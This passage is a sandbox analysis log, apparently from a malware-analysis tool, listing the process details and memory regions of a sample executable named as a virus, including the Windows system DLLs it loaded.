# Flog Txt Version 1 # Analyzer Version: 2024.2.1 # Analyzer Build Date: Mar 23 2024 12:02:19 # Log Creation Date: 27.04.2024 09:25:04.086 Process: id = "1" image_name = "2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" filename = "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" page_root = "0x43900000" os_pid = "0xf34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x778" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 116 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 117 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 118 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 119 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 120 start_va = 0x90000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 121 start_va = 0x290000 end_va = 0x293fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 122 start_va = 0x400000 end_va = 0xde0fff monitored = 1 entry_point = 0xdded44 region_type = mapped_file name = "2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe") Region: id = 123 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 124 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 125 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 126 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 127 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 128 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 129 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 130 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 131 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 270 start_va = 0x2a0000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 271 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 272 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 273 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 274 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 275 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 276 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 277 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 278 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 279 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 280 start_va = 0xdf0000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 281 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 282 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 284 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 285 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 286 start_va = 0x350000 end_va = 0x3b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 287 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 288 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 289 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 290 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 291 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 292 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 293 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 294 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 295 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 296 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 297 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 298 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 299 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 300 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 301 start_va = 0x745b0000 end_va = 0x745b8fff monitored = 0 entry_point = 0x745b1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 302 start_va = 0x72940000 end_va = 0x72a92fff monitored = 1 entry_point = 0x72941af8 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 303 start_va = 0x1020000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 304 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 305 start_va = 0x1080000 end_va = 0x1207fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 306 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 307 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 308 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 309 start_va = 0x1210000 end_va = 0x1390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 310 start_va = 0x13a0000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013a0000" filename = "" Region: id = 311 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 312 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 313 start_va = 0x27a0000 end_va = 0x289ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 314 start_va = 0x28a0000 end_va = 0x2c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 315 start_va = 0x2ca0000 end_va = 0x2f6efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 316 start_va = 0x27a0000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 317 start_va = 0x2890000 end_va = 0x289ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 318 start_va = 0x2f70000 end_va = 0x312ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 319 start_va = 0x75410000 end_va = 0x75493fff monitored = 0 entry_point = 0x754119a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 320 start_va = 0x2f70000 end_va = 0x30affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 321 start_va = 0x30f0000 end_va = 0x312ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 322 start_va = 0x75400000 end_va = 0x75404fff monitored = 0 entry_point = 0x754011d0 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 323 start_va = 0x2f70000 end_va = 0x306ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 324 start_va = 0x30a0000 end_va = 0x30affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 325 start_va = 0x3130000 end_va = 0x31d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 326 start_va = 0x31e0000 end_va = 0x32dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 327 start_va = 0x7ebd0000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ebd0000" filename = "" Region: id = 328 start_va = 0x32e0000 end_va = 0x33dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 329 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 330 start_va = 0x2d0000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 331 start_va = 0x2b0000 end_va = 0x2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 332 start_va = 0x744d0000 end_va = 0x7454ffff monitored = 0 entry_point = 0x744e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 333 start_va = 0x33e0000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 334 start_va = 0x33e0000 end_va = 0x34befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033e0000" filename = "" Region: id = 335 start_va = 0x3560000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 336 start_va = 0x2c0000 end_va = 0x2c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 337 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 338 start_va = 0x35a0000 end_va = 0x3777fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 339 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 340 start_va = 0x74670000 end_va = 0x7467afff monitored = 0 entry_point = 0x74671992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 341 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 342 start_va = 0x3f0000 end_va = 0x3f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 343 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 344 start_va = 0x3f0000 end_va = 0x3f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 345 start_va = 0x1020000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 346 start_va = 0x1070000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 347 start_va = 0x3780000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 348 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 349 start_va = 0x2800000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 350 start_va = 0x3980000 end_va = 0x3b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003980000" filename = "" Region: id = 351 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 352 start_va = 0x3b80000 end_va = 0x3cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 353 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 354 start_va = 0x72ec0000 end_va = 0x72f1efff monitored = 0 entry_point = 0x72ec2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 355 start_va = 0x74490000 end_va = 0x744a2fff monitored = 0 entry_point = 0x74491d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 356 start_va = 0x3f0000 end_va = 0x3f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 357 start_va = 0x34c0000 end_va = 0x353ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 358 start_va = 0xdf0000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 359 start_va = 0xe20000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 360 start_va = 0x77450000 end_va = 0x774d2fff monitored = 0 entry_point = 0x774523d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 361 start_va = 0xe00000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 362 start_va = 0x753d0000 end_va = 0x753f9fff monitored = 0 entry_point = 0x753d13f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 363 start_va = 0x27a0000 end_va = 0x27b4fff monitored = 0 entry_point = 0x27a13f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 364 start_va = 0x27c0000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 365 start_va = 0x753a0000 end_va = 0x753c0fff monitored = 0 entry_point = 0x753ae356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 366 start_va = 0x71ec0000 end_va = 0x71ed1fff monitored = 0 entry_point = 0x71ec1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 367 start_va = 0xe10000 end_va = 0xe1bfff monitored = 0 entry_point = 0xe1e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 397 start_va = 0xe10000 end_va = 0xe11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 398 start_va = 0x74680000 end_va = 0x7481dfff monitored = 0 entry_point = 0x746ae6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 399 start_va = 0x1060000 end_va = 0x1060fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 400 start_va = 0x2840000 end_va = 0x2841fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 405 start_va = 0x2850000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 406 start_va = 0x3ce0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 407 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 408 start_va = 0x769b0000 end_va = 0x76b4cfff monitored = 0 entry_point = 0x769b17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 409 start_va = 0x76bd0000 end_va = 0x76bf6fff monitored = 0 entry_point = 0x76bd58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 410 start_va = 0x76c40000 end_va = 0x76c51fff monitored = 0 entry_point = 0x76c41441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 411 start_va = 0x1060000 end_va = 0x106cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 412 start_va = 0x30b0000 end_va = 0x30effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 413 start_va = 0x35a0000 end_va = 0x369ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 414 start_va = 0x36f0000 end_va = 0x3777fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 415 start_va = 0x3ee0000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 416 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 445 start_va = 0x738c0000 end_va = 0x739b4fff monitored = 0 entry_point = 0x738d0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 446 start_va = 0x74640000 end_va = 0x74660fff monitored = 0 entry_point = 0x7464145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 447 start_va = 0x77400000 end_va = 0x77444fff monitored = 0 entry_point = 0x774011e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 448 start_va = 0x3070000 end_va = 0x3073fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 449 start_va = 0x36a0000 end_va = 0x36c7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db") Region: id = 450 start_va = 0x3080000 end_va = 0x3080fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003080000" filename = "" Region: id = 451 start_va = 0x3b80000 end_va = 0x3c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 452 start_va = 0x3cd0000 end_va = 0x3cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 453 start_va = 0x3b80000 end_va = 0x3c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 454 start_va = 0x3b80000 end_va = 0x3c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 455 start_va = 0x3b80000 end_va = 0x3c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 456 start_va = 0x3b80000 end_va = 0x3c80fff monitored = 1 entry_point = 0x0 region_type = private name = 